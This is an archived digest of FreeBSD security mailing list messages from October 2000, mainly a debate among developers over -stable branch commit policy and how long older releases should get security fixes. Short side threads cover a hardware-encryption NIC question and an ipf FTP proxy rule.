peter@FreeBSD.org; peter@yahoo-inc.com; peter@netplex.com.au "All of this is for nothing if we don't go to the stars" - JMS/B5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 16:35:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (tun.AwfulHak.org [194.242.139.173]) by hub.freebsd.org (Postfix) with ESMTP id 331E537B66D; Tue, 3 Oct 2000 16:35:28 -0700 (PDT) Received: from hak.lan.Awfulhak.org (root@hak.lan.awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.0/8.11.0) with ESMTP id e93NVZa70271; Wed, 4 Oct 2000 00:31:35 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.1/8.11.0) with ESMTP id e93NUNs35249; Wed, 4 Oct 2000 00:30:23 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200010032330.e93NUNs35249@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.1.1 10/15/1999 To: Paul Richards Cc: Jordan Hubbard , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org, brian@Awfulhak.org Subject: Re: cvs commit: src/usr.bin/finger finger.c In-Reply-To: Message from Paul Richards of "Tue, 03 Oct 2000 23:40:21 BST." <39DA6055.594B13E4@originative.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 04 Oct 2000 00:30:22 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > If it's now part of your full-time hattism to worry about this then I > > hope you'll start spending some number of hours each day in reviewing > > each and every change which goes into -stable. However many other > > I think you're looking at it the wrong way around. The stable team > wouldn't be putting in a lot of hours reviewing stable commits. Stable > commits would only occur if the stable team did them i.e. no-one else > would be allowed to commit to stable. The stable team would then monitor > -current, noting commits that are bug fixes, and slating them for a MFC > at a later date when it's felt they've had enough of a shakeout. I don't think that'd be a good idea - it'd just give this ``stable team'' too much to do. They wouldn't have a chance of identifying everything that's an MFC candidate. IMHO it would be far more practical to have them review/commit/deny submissions from others instead. > Paul Richards > FreeBSD Services Ltd -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 16:44:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 9282037B502; Tue, 3 Oct 2000 16:44:05 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e93NgbE16200; Tue, 3 Oct 2000 16:42:37 -0700 (PDT) Date: Tue, 3 Oct 2000 16:42:37 -0700 From: Alfred Perlstein To: Peter Wemm Cc: Jonathan Lemon , Paul Richards , Jordan Hubbard , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001003164236.Q27736@fw.wintelcom.net> References: <20001003155638.B73409@hub.freebsd.org> <200010032326.e93NQ7H17213@netplex.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <200010032326.e93NQ7H17213@netplex.com.au>; from peter@netplex.com.au on Tue, Oct 03, 2000 at 04:26:07PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Peter Wemm [001003 16:30] wrote: > Jonathan Lemon wrote: > > > > Uh. If only the "-stable" team were allowed to commit to -stable, > > then it would quickly become the -stale branch. I think that we had > > this at one point with 3.X, and there were lots of complaints. > > Yes, this is what happened with 3.x and it was a disaster. We must not > let this happen again. > There's a large difference between kernel and userland here, kernel changes need to be backported relatively quickly while userland can allow for a longer test period. Seperate policies may serve us better than one that covers the entire tree. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 16:54:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id A02BD37B502; Tue, 3 Oct 2000 16:54:36 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e93NsMX84081; Tue, 3 Oct 2000 16:54:22 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: Paul Richards Cc: Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c In-Reply-To: Message from Paul Richards of "Tue, 03 Oct 2000 23:40:21 BST." <39DA6055.594B13E4@originative.co.uk> Date: Tue, 03 Oct 2000 16:54:21 -0700 Message-ID: <84077.970617261@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I think you're looking at it the wrong way around. The stable team > wouldn't be putting in a lot of hours reviewing stable commits. Fine, change "reviewing" to "doing" and my original point still holds. How many hours are you and the other developers who volunteer willing to commit to this? That's all I want to know and it's a reasonable question to ask. I'm also not just asking this to be a hard-ass, I've had some serious problems over the last 7 years with getting people to actually put their commit bits where their mouthes are when it comes to responding to MFC requests (which do occur) and doing them in a sane and timely fashion for -stable. My experience with the committees we've set up to do such things is also that they don't tend to work over the long term, the rest of the project's expectations quickly becoming desynched with the realities of the situation and leading in turn to accusations of sloth and general finger-pointing. I'm not saying that it's absolutely impossible for such groups to work, simply that history has not shown their effectiveness in the most favorable light so far and any working group(s) this project may create will have to fight an uphill battle to overcome this. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 16:57:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 1712537B502; Tue, 3 Oct 2000 16:57:48 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id RAA24261; Tue, 3 Oct 2000 17:56:02 -0600 (MDT) Message-Id: <4.3.2.7.2.20001003175130.043dc4c0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 03 Oct 2000 17:55:55 -0600 To: Alfred Perlstein , Peter Wemm From: Brett Glass Subject: Re: cvs commit: src/usr.bin/finger finger.c Cc: Jonathan Lemon , Paul Richards , Jordan Hubbard , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-Reply-To: <20001003164236.Q27736@fw.wintelcom.net> References: <200010032326.e93NQ7H17213@netplex.com.au> <20001003155638.B73409@hub.freebsd.org> <200010032326.e93NQ7H17213@netplex.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 05:42 PM 10/3/2000, Alfred Perlstein wrote: >There's a large difference between kernel and userland here, kernel >changes need to be backported relatively quickly while userland >can allow for a longer test period. Seperate policies may serve >us better than one that covers the entire tree. What about root compromises in userland -- e.g. in setuid apps, daemons that run (or at least start) as root, etc.? It seems to me that the urgency of backporting a fix has more to do with the potential risk one incurs by running the unfixed code, rather than with which "ring" the code is in. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 17: 5:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.originative.co.uk (mailgate.originative.co.uk [194.217.50.228]) by hub.freebsd.org (Postfix) with ESMTP id 2973037B503; Tue, 3 Oct 2000 17:05:16 -0700 (PDT) Received: from originative.co.uk (lobster.originative.co.uk [194.217.50.241]) by mailgate.originative.co.uk (Postfix) with ESMTP id 3FDC61D140; Wed, 4 Oct 2000 01:05:11 +0100 (BST) Message-ID: <39DA7437.EAD39E03@originative.co.uk> Date: Wed, 04 Oct 2000 01:05:11 +0100 From: Paul Richards X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Jordan Hubbard Cc: Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c References: <84077.970617261@winston.osd.bsdi.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jordan Hubbard wrote: > > > I think you're looking at it the wrong way around. The stable team > > wouldn't be putting in a lot of hours reviewing stable commits. > > Fine, change "reviewing" to "doing" and my original point still holds. > How many hours are you and the other developers who volunteer willing > to commit to this? That's all I want to know and it's a reasonable > question to ask. Personally I'm willing to do this full time. > I'm not saying that it's absolutely impossible for such groups to > work, simply that history has not shown their effectiveness in the > most favorable light so far and any working group(s) this project may > create will have to fight an uphill battle to overcome this. At the moment I can't see it working either since there's a strong feeling from one side of the project that -stable should be closer to the bleeding edge than the other side of the project would like and until that is resolved any group of people trying to monitor what goes into -stable is going to fall foul of one set of opinions or the other. Paul Richards FreeBSD Services Ltd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 17:23: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 2828137B502; Tue, 3 Oct 2000 17:22:55 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e940MeX84226; Tue, 3 Oct 2000 17:22:40 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: Paul Richards Cc: Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] In-Reply-To: Message from Paul Richards of "Wed, 04 Oct 2000 01:05:11 BST." <39DA7437.EAD39E03@originative.co.uk> Date: Tue, 03 Oct 2000 17:22:39 -0700 Message-ID: <84222.970618959@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > At the moment I can't see it working either since there's a strong > feeling from one side of the project that -stable should be closer to > the bleeding edge than the other side of the project would like and > until that is resolved any group of people trying to monitor what goes > into -stable is going to fall foul of one set of opinions or the other. Watching this discussion's highlights (lowlights? :) so far, I'd actually have to say that I'm tempted to go back and call for a revision of our existing policy which states that any -stable release more than 2 releases old is desupported. I was one of the authors of that policy and can only say that it seemed like a good idea at the time given the relatively small number of engineers we had and the frequent fights over unrealistic expectations that were occuring in the mailing lists. Nowadays we have a lot more engineers, however, and a lot more "customers" who are still running releases like 3.4 and would like *some* measure of support. I would therefore like to propose the following: We change the wording of our policy to state that upgrading to something within two releases of the "current -stable" product is the *recommended* action but that we will continue to provide, WHERE POSSIBLE, support for older branches of FreeBSD. We also stop telling people running 3.x (or whatever our "older -stable" might be at any given time) that they have to upgrade to receive any support at all and, instead, handle their queries on a case by case basis to see if it's possible for us to just whack whatever problem they might have over the head in the relevant branch and ask them to simply upgrade to the head of that branch. In cases where that's just not possible, we then ask them to jump up a branch. We could also look into providing an "update" command or something which would pull either sources or binaries over from a snapshot box and make the process of getting up to the branch-head a lot easier. It's long been on my wishlist and I'm at the point where I'd be willing to devote some BSDi resources to both writing the software and setting up a build box for creating the relevant binaries on an ongoing basis. This would seem to me to give us the best of all possible worlds. That portion of our customer base which wants a truly moribund -stable with just security enhancements and "by special request" fixes could have that by lagging back a branch. The other portion which wants a more active -stable could subscribe to the most current -stable. The final remaining portion which enjoys watching their blood come out in arterial spurts could subscribe to -current. :) What say? - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 17:34:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C672537B502; Tue, 3 Oct 2000 17:34:14 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA79033; Tue, 3 Oct 2000 17:34:14 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Tue, 3 Oct 2000 17:34:14 -0700 From: Kris Kennaway To: Jordan Hubbard Cc: Paul Richards , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Message-ID: <20001003173414.A58372@freefall.freebsd.org> References: <84222.970618959@winston.osd.bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <84222.970618959@winston.osd.bsdi.com>; from jkh@winston.osd.bsdi.com on Tue, Oct 03, 2000 at 05:22:39PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 05:22:39PM -0700, Jordan Hubbard wrote: > I would therefore like to propose the following: We change the wording > of our policy to state that upgrading to something within two releases > of the "current -stable" product is the *recommended* action but that > we will continue to provide, WHERE POSSIBLE, support for older > branches of FreeBSD. We also stop telling people running 3.x (or I suggest that in practise it will be all but impossible for people to get active bugfix support for 3.x, and we'd probably be giving a false impression if we say otherwise. If some of the developers really plan to devote significant efforts towards supporting 3.x (or whatever "dead branch of the month" we have), let them do so for 3 or 4 months to prove their ability to do so, and if it's actually worked by the end of the trial period then we can officially change the published policy. Speaking for myself as part of the security team, I don't want to support 3.x for security fixes any more, since it's been just too damn hard to do that over the past few months (i.e. in fact we havent been providing good security support because developers aren't backporting security fixes), and as warner pointed out we've now passed our "3 releases along a branch" cutoff policy. Again, if someone else is going to step up and commit to fixing problems in 3.x I'll work with them (i.e. give them an advisory prerelease and release deadline to get the fix merged by, and if they miss it, too bad), but I would prefer not to do this myself for time constraints. I think I'd like to formally announce this unless someone steps up to the plate with the above. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 17:43:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id BB0B137B502; Tue, 3 Oct 2000 17:43:21 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e940hDw18516; Tue, 3 Oct 2000 17:43:13 -0700 (PDT) Date: Tue, 3 Oct 2000 17:43:13 -0700 From: Alfred Perlstein To: Jordan Hubbard Cc: Paul Richards , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Message-ID: <20001003174313.U27736@fw.wintelcom.net> References: <84222.970618959@winston.osd.bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <84222.970618959@winston.osd.bsdi.com>; from jkh@winston.osd.bsdi.com on Tue, Oct 03, 2000 at 05:22:39PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Jordan Hubbard [001003 17:23] wrote: > > We could also look into providing an "update" command or something > which would pull either sources or binaries over from a snapshot box > and make the process of getting up to the branch-head a lot easier. > It's long been on my wishlist and I'm at the point where I'd be > willing to devote some BSDi resources to both writing the software > and setting up a build box for creating the relevant binaries on an > ongoing basis. You ought to go to the cube next to you, Mike Smith said he had something along the lines of that, er, something that would generate a binary delta that could be spammed over an existing install. > This would seem to me to give us the best of all possible worlds. > That portion of our customer base which wants a truly moribund -stable > with just security enhancements and "by special request" fixes could > have that by lagging back a branch. The other portion which wants a > more active -stable could subscribe to the most current -stable. The > final remaining portion which enjoys watching their blood come out in > arterial spurts could subscribe to -current. :) > > What say? I think supporting back to 3.x is a good idea. It's pretty harsh to be telling users to bugger off when we've only just released 4.0 6 months ago and they're stuck with 3.x. I'd love to see a couple of committers come on board with the explicit job of backporting important fixes, perhaps in passing people interested in the project we could offer a backporting position as a starter or full time post sort of like the ports team. Might I suggest it'd be pretty helpful to have a couple of speedy 3.x (and probably 4.x) boxes set up some place with console access to make these types of fixes easier for our developers lacking in hardware resources. Running them off a private net behind freefall would work pretty well no? -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 18: 1:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from delivery.insweb.com (delivery.insweb.com [12.16.212.64]) by hub.freebsd.org (Postfix) with ESMTP id 4E29B37B66E; Tue, 3 Oct 2000 18:01:29 -0700 (PDT) Received: from ursine.com (dhcp4-202.secure.insweb.com [192.168.4.202]) by delivery.insweb.com (8.9.2/8.9.3) with ESMTP id SAA92029; Tue, 3 Oct 2000 18:01:28 -0700 (PDT) (envelope-from fbsd-security@ursine.com) Message-ID: <39DA81E9.FD461622@ursine.com> Date: Tue, 03 Oct 2000 18:03:37 -0700 From: Michael Bryan X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] References: <84222.970618959@winston.osd.bsdi.com> <20001003173414.A58372@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Tue, Oct 03, 2000 at 05:22:39PM -0700, Jordan Hubbard wrote: > > > I would therefore like to propose the following: We change the wording > > of our policy to state that upgrading to something within two releases > > of the "current -stable" product is the *recommended* action but that > > we will continue to provide, WHERE POSSIBLE, support for older > > branches of FreeBSD. We also stop telling people running 3.x (or I like this. A lot. > I suggest that in practise it will be all but impossible for people to > get active bugfix support for 3.x, and we'd probably be giving a false > impression if we say otherwise. > [...] > Speaking for myself as part of the security team, I don't want to > support 3.x for security fixes any more, since it's been just too damn > hard to do that over the past few months (i.e. in fact we havent been > providing good security support because developers aren't backporting > security fixes), and as warner pointed out we've now passed our "3 > releases along a branch" cutoff policy. Well, it's been said before, but I'll add my two cents to this. Support for at least security-related issues really needs to be provided for a reasonable duration, probably about a year, maybe longer, after a release comes out. Some production environments need (or at least strongly desire) this in order to more cautiously roll out full-on upgrades in a more planned mode of operation, where planning/testing/rollout can take many months, up to a significant part of a year. Shortcuts/quickfixes can be done in a more timely fashion when an urgent problem can be fixed with a relatively isolated patch or utility update, but that's frequently much harder to get approved when you're talking about a full upgrade that touches a lot more of the system. Having a cutoff based on number of releases just isn't realistic for the way a lot of production sites operate, not when the releases come out in relatively quick succession. 4.0 came out in March, and 4.1 in July. A lot of sites are hesitant to upgrade to any x.0 point release (whether or not FreeBSD warrants that caution is a separate issue, it -is- a real concern a lot of companies face and have been burned by.) So it's extremely unrealistic to tell them "Yes, you rolled out 3.5 in June when it first came out, but now you have to do a major upgrade to 4.x to get security fix 'foobar', even though your schedule for rollout says you were going to do it in November/December". :-/ If FreeBSD does -not- do this, I strongly feel that a lot of potential users of it will simply say "Sorry, we need at least one year of critical bug/security fix support on any given release tree, so we'll go with somebody who can give us that." I know this has been discussed before, but since Jordon has stepped up to the plate with what I think is an extremely realistic and workable framework for release support, I wanted to try to make sure that gets supported, and not shot down. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 18:13:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from nameserver.austclear.com.au (nameserver.austclear.com.au [192.83.119.132]) by hub.freebsd.org (Postfix) with ESMTP id 06EE837B503; Tue, 3 Oct 2000 18:13:03 -0700 (PDT) Received: from tungsten.austclear.com.au (tungsten.austclear.com.au [192.168.70.1]) by nameserver.austclear.com.au (8.9.3/8.9.3) with ESMTP id MAA71502; Wed, 4 Oct 2000 12:12:56 +1100 (EST) Received: from tungsten (tungsten [192.168.70.1]) by tungsten.austclear.com.au (8.9.3/8.9.3) with ESMTP id MAA25657; Wed, 4 Oct 2000 12:12:56 +1100 (EST) Message-Id: <200010040112.MAA25657@tungsten.austclear.com.au> X-Mailer: exmh version 2.1.1 10/15/1999 To: freebsd-hardware@freebsd.org Cc: freebsd-security@freebsd.org Subject: Intel PRO/100 S NIC support Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 04 Oct 2000 12:12:55 +1100 From: Tony Landells Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Has anyone tried using an Intel PRO/100 S card under FreeBSD? It has hardware encryption, and I was just wondering whether it can be used by FreeBSD and if so how fast it is--the Intel Web site seems very vague and I'm learning that my idea of fast is substantially different to, say, Cisco with their VPN routers... Thanks, Tony -- Tony Landells Systems Manager Ph: +61 3 9677 9319 Australian Clearing Services Pty Ltd Fax: +61 3 9677 9355 Level 4, Rialto North Tower 525 Collins Street Melbourne VIC 3000 Australia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 18:31: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.hellasnet.gr (mail.hellasnet.gr [212.54.192.3]) by hub.freebsd.org (Postfix) with ESMTP id A046237B502; Tue, 3 Oct 2000 18:30:53 -0700 (PDT) Received: from hades.hell.gr (ppp1.patr.hellasnet.gr [212.54.197.16]) by mail.hellasnet.gr (8.9.1/8.9.1) with ESMTP id AAA17581; Wed, 4 Oct 2000 00:31:25 -0200 (GMT) Received: (from charon@localhost) by hades.hell.gr (8.11.0/8.11.0) id e941Ova27289; Wed, 4 Oct 2000 04:24:57 +0300 (EEST) Date: Wed, 4 Oct 2000 04:24:57 +0300 From: Giorgos Keramidas To: Brian Somers Cc: Paul Richards , Jordan Hubbard , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001004042457.A24642@hades.hell.gr> References: <200010032330.e93NUNs35249@hak.lan.Awfulhak.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <200010032330.e93NUNs35249@hak.lan.Awfulhak.org>; from brian@Awfulhak.org on Wed, Oct 04, 2000 at 12:30:22AM +0100 X-PGP-Fingerprint: 3A 75 52 EB F1 58 56 0D - C5 B8 21 B6 1B 5E 4A C2 X-URL: http://students.ceid.upatras.gr/~keramida/index.html Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 12:30:22AM +0100, Brian Somers wrote: > > I don't think that'd be a good idea - it'd just give this ``stable > team'' too much to do. They wouldn't have a chance of identifying > everything that's an MFC candidate. IMHO it would be far more > practical to have them review/commit/deny submissions from others > instead. Even people that are not in a separate ``stable team'' can contribute to testing of new features, and making sure that everything that is MFC'ed to -stable is working as it was expected. While reading this thread tonight, I went and created a special procmail rule to my filters to leave a separate copy of the messages that are sent to cvs-all and contain the string "MFC: " in their body, into a separate folder called freebsd-cvs-mfc. Having all the commit messages in a folder like that will constantly remind me that these things are already into -stable, and that I should spend some time testing them to see how `stable' they are. Jordan is very right in one thing he said: Keeping -stable stable should be everyone's job, and making that an actual reality rather than just a statement would go a long ways towards preventing what just happened from happening again. I think that spending some time reading the MFC messages separately and testing those features that I can, and sending my results on this list, is a Good Thing(TM). Unless anyone dislikes this test-the-merges-after-they-re-done practise, I think I will spend a few hours a day testing -stable things and helping make them more -stable :) -- Giorgos Keramidas, < keramida @ ceid . upatras . gr > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 18:32:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from cdrrdslgw2poolA156.cdrr.uswest.net (cdrrdslgw2poolA156.cdrr.uswest.net [63.228.160.156]) by hub.freebsd.org (Postfix) with ESMTP id 2A78137B502 for ; Tue, 3 Oct 2000 18:32:29 -0700 (PDT) Received: (from dean@localhost) by deanstoy.home.uswest.net (8.11.0/8.9.2) id e930qih84096; Mon, 2 Oct 2000 19:52:44 -0500 (CDT) (envelope-from dean) Date: Mon, 2 Oct 2000 19:52:44 -0500 (CDT) From: "Dean M. Phillips" Message-Id: <200010030052.e930qih84096@deanstoy.home.uswest.net> To: buliwyf@libertad.univalle.edu.co Cc: security@FreeBSD.ORG In-reply-to: (buliwyf@libertad.univalle.edu.co) Subject: Re: NATD and ipf Reply-To: deanmphillips@uswest.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I use a line like map tun0 0/0 -> 0/32 proxy port ftp ftp/tcp to open a small hole in the firewall for the incomming data connection. -- Dean M. Phillips deanmphillips@uswest.net Office: 319-295-0407 Home: 319-373-9825 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 18:52:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id 001C337B502; Tue, 3 Oct 2000 18:52:03 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13gdiy-00014I-00; Tue, 03 Oct 2000 20:52:00 -0500 Date: Tue, 3 Oct 2000 20:51:59 -0500 From: Ade Lovett To: Alfred Perlstein Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Message-ID: <20001003205159.A20891@FreeBSD.org> References: <84222.970618959@winston.osd.bsdi.com> <20001003174313.U27736@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001003174313.U27736@fw.wintelcom.net>; from bright@wintelcom.net on Tue, Oct 03, 2000 at 05:43:13PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [cc's trimmed a little] On Tue, Oct 03, 2000 at 05:43:13PM -0700, Alfred Perlstein wrote: > Might I suggest it'd be pretty helpful to have a couple of speedy > 3.x (and probably 4.x) boxes set up some place with console access > to make these types of fixes easier for our developers lacking in > hardware resources. What about ports? How do you propose that they be tested, as opposed to "it-compiles-so-ship-it" on these 3.x boxes if, say, the developer in question only runs 4.x boxes, with a single not-yet-built 5.x box for when 5.x settles down? Or can we stick with the current ports policy of tracking -stable and -current only, with a good luck to everyone else? And what does this policy mean anyway when we have two -stables, with the package building cluster building for three environments? -aDe -- Ade Lovett, Austin, TX. ade@FreeBSD.org FreeBSD: The Power to Serve http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 19: 3:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 5EF6837B502; Tue, 3 Oct 2000 19:03:34 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e9423YH21170; Tue, 3 Oct 2000 19:03:34 -0700 (PDT) Date: Tue, 3 Oct 2000 19:03:34 -0700 From: Alfred Perlstein To: Ade Lovett Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Message-ID: <20001003190333.Y27736@fw.wintelcom.net> References: <84222.970618959@winston.osd.bsdi.com> <20001003174313.U27736@fw.wintelcom.net> <20001003205159.A20891@FreeBSD.org> 